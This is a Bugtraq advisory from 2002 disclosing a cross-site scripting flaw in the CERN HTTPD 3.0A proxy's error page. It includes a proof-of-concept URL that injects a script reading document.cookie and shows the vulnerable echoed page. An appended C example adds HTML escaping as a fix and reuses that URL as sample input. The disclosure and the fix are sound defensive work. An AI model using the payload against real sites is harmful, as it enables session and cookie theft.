Bugtraq mailing list archives

CERN Proxy Server: Cross-Site Scripting Vulnerability


From: "TAKAGI, Hiromitsu" <takagi.hiromitsu () aist go jp>
Date: Mon, 12 Aug 2002 08:41:40 +0900

CERN Proxy Server: Cross-Site Scripting Vulnerability
=====================================================

Affected:
  CERN HTTPD 3.0A
  http://www.w3.org/Daemon/Activity.html
  
Vendor Status:
  CERN httpd team (httpd () w3 org) was notified on Aug 10, 2001 but
  they did not respond.

Exploit:
  http://nonexistenthost.google.com/<SCRIPT>document.write(document.cookie)</SCRIPT>

  ========================================================
  <HTML>
  <HEAD>
  <TITLE>Error Message</TITLE>
  </HEAD>
  <BODY>
  <H1>Fatal Error 500</H1>
  Can't Access Document:  http://nonexistenthost.google.com/<SCRIPT>document.write(document.cookie)</SCRIPT>.
  <P>
  <B>Reason:</B> Can't locate remote host:  nonexistenthost.google.com.
  <P>
...snip...
  ========================================================

  Similar problems have been found in Proxomitron Naoko-4 BetaFour,
  Microsoft ISA Server and Squid 2.4 DEVEL4.
  <http://www.securityfocus.com/bid/3087>
  <http://www.microsoft.com/technet/security/bulletin/MS01-045.asp>
  <http://www.securityfocus.com/archive/1/197606>


Best regards,
--
Hiromitsu Takagi
http://staff.aist.go.jp/takagi.hiromitsu/
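
The error page quoted in the advisory echoes the requested URL into HTML without escaping. The following C code is an added example, not part of the original post and not CERN httpd's own code: it builds the same error body but HTML-escapes the URL and host first. The function names, buffer sizes and closing tags are assumptions.

```c
#include <stdio.h>
#include <string.h>
/* Escape HTML metacharacters from src into dst (capacity cap).
 * Returns 0 on success, -1 if the escaped text does not fit. */
int html_escape(const char *src, char *dst, size_t cap)
{
    size_t used = 0;
    if (cap == 0) return -1;
    for (; *src; src++) {
        char one[2] = { *src, '\0' };
        const char *rep = one;          /* default: copy the byte as-is */
        switch (*src) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        size_t n = strlen(rep);
        if (used + n >= cap) { dst[used] = '\0'; return -1; }
        memcpy(dst + used, rep, n);
        used += n;
    }
    dst[used] = '\0';
    return 0;
}

/* Build the error body quoted in the advisory, escaping the request data.
 * Closing tags are assumed; the advisory snips the rest of the page. */
int build_error_page(const char *url, const char *host, char *out, size_t cap)
{
    char eurl[1024], ehost[256];        /* assumed size limits */
    if (html_escape(url, eurl, sizeof eurl) || html_escape(host, ehost, sizeof ehost))
        return -1;                      /* reject rather than truncate mid-entity */
    int n = snprintf(out, cap,
        "<HTML>\n<HEAD>\n<TITLE>Error Message</TITLE>\n</HEAD>\n<BODY>\n"
        "<H1>Fatal Error 500</H1>\n"
        "Can't Access Document:  %s.\n<P>\n"
        "<B>Reason:</B> Can't locate remote host:  %s.\n<P>\n</BODY>\n</HTML>\n", eurl, ehost);
    return (n < 0 || (size_t)n >= cap) ? -1 : 0;
}

int main(void)
{
    char page[4096];
    /* Sample input: the URL shown in the advisory. */
    const char *url = "http://nonexistenthost.google.com/<SCRIPT>document.write(document.cookie)</SCRIPT>";
    if (build_error_page(url, "nonexistenthost.google.com", page, sizeof page) == 0) fputs(page, stdout);
    return 0;
}
```

With the escaping in place the browser renders the `<SCRIPT>` element as literal text in the error message.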

